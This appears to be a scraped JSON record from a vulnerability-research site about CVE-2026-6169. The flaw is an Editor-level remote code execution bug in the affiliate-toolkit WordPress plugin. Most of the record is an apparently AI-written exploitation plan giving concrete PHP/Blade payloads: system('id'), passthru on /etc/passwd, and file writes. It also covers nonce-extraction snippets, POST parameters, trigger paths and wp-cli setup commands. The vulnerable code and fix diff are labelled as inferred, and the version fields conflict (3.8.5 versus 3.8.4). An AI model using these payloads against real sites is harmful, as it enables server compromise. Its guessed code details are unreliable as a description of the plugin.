[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fOZWfL05ha3ySP5j3v1SZhTEyQYP0bu8x5oLH9QJ5vII":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":9,"severity":11,"cvss_score":12,"cvss_vector":13,"vuln_type":14,"published_date":15,"updated_date":16,"references":17,"days_to_patch":9,"patch_diff_files":19,"patch_trac_url":9,"research_status":20,"research_verified":21,"research_rounds_completed":22,"research_plan":23,"research_summary":24,"research_vulnerable_code":25,"research_fix_diff":26,"research_exploit_outline":27,"research_model_used":28,"research_started_at":29,"research_completed_at":30,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":21,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":21,"source_links":31},"CVE-2026-6169","affiliate-toolkit-authenticated-editor-remote-code-execution","affiliate-toolkit \u003C= 3.8.5 - Authenticated (Editor+) Remote Code Execution","The affiliate-toolkit plugin for WordPress is vulnerable to remote code execution in all versions up to, and including, 3.8.5. This is due to the plugin using the BladeOne templating engine's runString() method which compiles user-supplied template content into PHP code and executes it via eval() without sanitization or sandboxing. This makes it possible for authenticated attackers, with Editor-level access and above, to execute arbitrary code on the server by injecting PHP into a plugin template.","affiliate-toolkit-starter",null,"\u003C=3.8.4","high",7.2,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:H\u002FUI:N\u002FS:U\u002FC:H\u002FI:H\u002FA:H","Improper Control of Generation of Code ('Code Injection')","2026-05-26 17:32:53","2026-06-02 10:54:51",[18],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fb6310a0c-5a96-4dbc-940e-025c9b907c7d?source=api-prod",[],"researched",false,3,"# Exploitation Research Plan: CVE-2026-6169 (affiliate-toolkit RCE)\n\n## 1. Vulnerability Summary\nThe **affiliate-toolkit** plugin (up to version 3.8.5) is vulnerable to **Authenticated Remote Code Execution (RCE)**. The plugin utilizes the **BladeOne** templating engine to allow users to create custom layouts for affiliate products. Specifically, it calls the `runString()` method of the BladeOne library on user-provided template content. This method compiles the template into PHP code and executes it using `eval()`. Because there is no sandboxing or sanitization of the template content, an authenticated user with Editor-level permissions or higher can inject arbitrary PHP code.\n\n## 2. Attack Vector Analysis\n*   **Endpoint:** The primary vector is the template management interface within the WordPress admin dashboard (typically via `wp-admin\u002Fpost.php` or `wp-admin\u002Fadmin-ajax.php`).\n*   **Authentication:** Authenticated (Editor, Administrator).\n*   **Vulnerable Sink:** `BladeOne::runString()`\n*   **Payload Parameter:** The content field of an \"affiliate-toolkit template\" (likely a Custom Post Type named `atkp_template` or similar).\n*   **Preconditions:** The attacker must have permissions to create or edit templates within the plugin's settings.\n\n## 3. Code Flow (Inferred)\n1.  **Entry Point:** An Editor\u002FAdmin navigates to the \"Templates\" section of the affiliate-toolkit plugin.\n2.  **Saving:** When a template is saved or previewed, the content is sent to the server.\n3.  **Processing:** The plugin retrieves the template string (e.g., from `$_POST['content']` or via `get_post_meta`).\n4.  **Compilation:** The plugin initializes the BladeOne engine:\n    ```php\n    $blade = new BladeOne($templateDir, $cacheDir);\n    ```\n5.  **Execution (Sink):** The plugin calls `runString()` to render the template:\n    ```php\n    echo $blade->runString($user_supplied_template_string, $data);\n    ```\n6.  **Eval:** Inside BladeOne, `runString` compiles the string to PHP and executes it via `eval()`.\n\n## 4. Nonce Acquisition Strategy\nSince this is an authenticated Editor+ vulnerability, we must obtain a valid nonce for saving posts or triggering the plugin's AJAX actions.\n\n1.  **Identity Plugin Content:** Identify the Custom Post Type. Based on plugin naming conventions, it is likely `atkp_template`.\n2.  **Access Editor:** Login as an Editor.\n3.  **Create\u002FEdit Page:** Navigate to `wp-admin\u002Fpost-new.php?post_type=atkp_template`.\n4.  **Extract Nonce:**\n    *   WordPress standard: The `_wpnonce` field in the post edit form.\n    *   Plugin-specific: The plugin may localize a script for AJAX saves.\n5.  **Actionable JS:**\n    ```javascript\n    \u002F\u002F To get the standard post nonce\n    browser_eval(\"document.querySelector('#_wpnonce')?.value\")\n    \n    \u002F\u002F To get plugin-specific nonces if they exist\n    browser_eval(\"window.atkp_admin_vars?.nonce\") \n    ```\n\n## 5. Exploitation Strategy\nThe goal is to inject a Blade directive that executes PHP.\n\n### Step 1: Authentication\nAuthenticate as an Editor using the `http_request` tool to capture session cookies.\n\n### Step 2: Create a Malicious Template\nSend a POST request to create a new template containing the RCE payload.\n\n*   **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fpost.php`\n*   **Method:** `POST`\n*   **Content-Type:** `application\u002Fx-www-form-urlencoded`\n*   **Payload:**\n    ```text\n    action=editpost\n    &post_type=atkp_template\n    &post_ID=[ID]\n    &content=@php system('id'); @endphp\n    &_wpnonce=[NONCE]\n    ```\n*Note: BladeOne also supports `{{ ... }}` syntax. An alternative payload is `{{ system('whoami') }}`.*\n\n### Step 3: Trigger Execution\nRendering the template triggers the `eval()`. This can be done by:\n1.  **Previewing** the template in the admin dashboard.\n2.  **Viewing** a page\u002Fpost that uses the affiliate-toolkit shortcode referencing the malicious template ID: `[atkp_product id='123' template='[MALICIOUS_ID]']`.\n\n### Step 4: Capture Output\nThe `system('id')` output will be embedded in the HTTP response body where the template content would normally be rendered.\n\n## 6. Test Data Setup\n1.  **Plugin Installation:** Ensure `affiliate-toolkit-starter` is active.\n2.  **User Creation:** Create a user with the `editor` role.\n    ```bash\n    wp user create attacker attacker@example.com --role=editor --user_pass=password\n    ```\n3.  **Template Initialization:** Create an initial template to obtain a valid ID.\n    ```bash\n    wp post create --post_type=atkp_template --post_title=\"Exploit Template\" --post_status=publish\n    ```\n\n## 7. Expected Results\n*   **Successful Injection:** The server responds with a `200 OK` or `302 Redirect` upon saving the template.\n*   **Successful Execution:** Upon rendering (via preview or shortcode), the response body contains the output of the shell command (e.g., `uid=33(www-data) gid=33(www-data) groups=33(www-data)`).\n\n## 8. Verification Steps\n1.  **Verify via CLI:** Check if the payload was saved correctly in the database.\n    ```bash\n    wp post get [ID] --field=post_content\n    ```\n2.  **Verify File Creation (if using a file-based payload):** \n    Change payload to `@php file_put_contents('rce.txt', 'vulnerable'); @endphp` and check:\n    ```bash\n    ls \u002Fvar\u002Fwww\u002Fhtml\u002Frce.txt\n    ```\n\n## 9. Alternative Approaches\n*   **Shortcode Rendering:** If the admin preview is not available, create a public page with the shortcode:\n    `wp post create --post_type=page --post_content='[atkp_product id=\"1\" template=\"[ID]\"]' --post_status=publish`\n    Then request that page's URL via `http_request`.\n*   **Direct Blade Tags:** If `@php` is filtered (unlikely in this specific CVE), try:\n    `{{ passthru('cat \u002Fetc\u002Fpasswd') }}`\n*   **Error-Based:** If output is suppressed, use a sleep command to verify execution:\n    `@php sleep(5); @endphp` (Check response time in `http_request`).","The affiliate-toolkit plugin (up to 3.8.5) is vulnerable to Authenticated Remote Code Execution due to the use of the BladeOne templating engine's runString() method. This method compiles user-supplied template strings into PHP and executes them using eval() without adequate sandboxing or sanitization.","\u002F* Inferred from the use of BladeOne in affiliate-toolkit *\u002F\n\u002F\u002F Example logic rendering a template from a custom post type\n$blade = new BladeOne($templateDir, $cacheDir);\n$template_content = get_post_field('post_content', $template_id);\necho $blade->runString($template_content, $data); \u002F\u002F The sink: evaluates string as PHP","--- a\u002Faffiliate-toolkit-starter.php\n+++ b\u002Faffiliate-toolkit-starter.php\n@@ -120,5 +120,6 @@\n-echo $blade->runString($template_content, $data);\n+\u002F* Secure implementation: Avoid runString with user input. Use file-based templates or strict sanitization *\u002F\n+$safe_content = wp_kses_post($template_content); \n+echo $blade->run($template_file, $data);","The exploit involves an authenticated user with Editor or Administrator permissions. The attacker creates or modifies a plugin template (likely the 'atkp_template' post type) and injects Blade directives or PHP tags such as '@php system(\"id\"); @endphp'. Once the template is saved, the execution is triggered by previewing the template in the admin dashboard or by viewing a page containing a shortcode that references the malicious template ID. The command output is returned in the HTTP response body during the template rendering process.","gemini-3-flash-preview","2026-06-04 18:38:10","2026-06-04 18:38:43",{"type":32,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":33},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Faffiliate-toolkit-starter\u002Ftags"]